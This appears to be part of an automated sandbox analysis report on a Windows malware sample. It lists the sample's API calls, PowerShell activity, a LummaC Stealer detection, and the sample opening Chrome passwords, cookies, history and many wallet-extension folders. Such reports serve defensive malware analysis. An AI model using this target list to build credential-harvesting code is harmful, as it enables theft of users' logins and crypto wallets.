                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0042720A
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00426A08
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_004272C9
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLastError,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,0_2_0042AAA0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_0042736A
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0042732E
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,0_2_0042ABDB
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLocaleInfoA,_xtoa_s@20,0_2_0041EB8E
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_0042AC16
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0042AD53
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLocaleInfoA,0_2_00426E50
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _LcidFromHexString,GetLocaleInfoA,0_2_00426F32
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_00426FC8
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_004267B7
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: GetLocaleInfoA,1_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_11174796
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_11174898
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_11174A69
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042A830 cpuid 0_2_0042A830
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00418030 GetLocalTime,GetTickCount,std::ios_base::_Ios_base_dtor,0_2_00418030
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041C5EA GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,0_2_0041C5EA

                                Stealing of Sensitive Information

                                barindex
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: 21.2.Close.exe.pif.1000000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.Close.exe.pif.1000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000013.00000003.742951268.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714649771.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.717533692.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.742876893.0000000003B61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714824323.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743032494.0000000004C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.717322865.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.827312389.0000000001000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743009888.0000000003B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743109153.0000000004C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714597273.00000000053F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714476620.0000000004C29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Close.exe.pif PID: 4916, type: MEMORYSTR
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
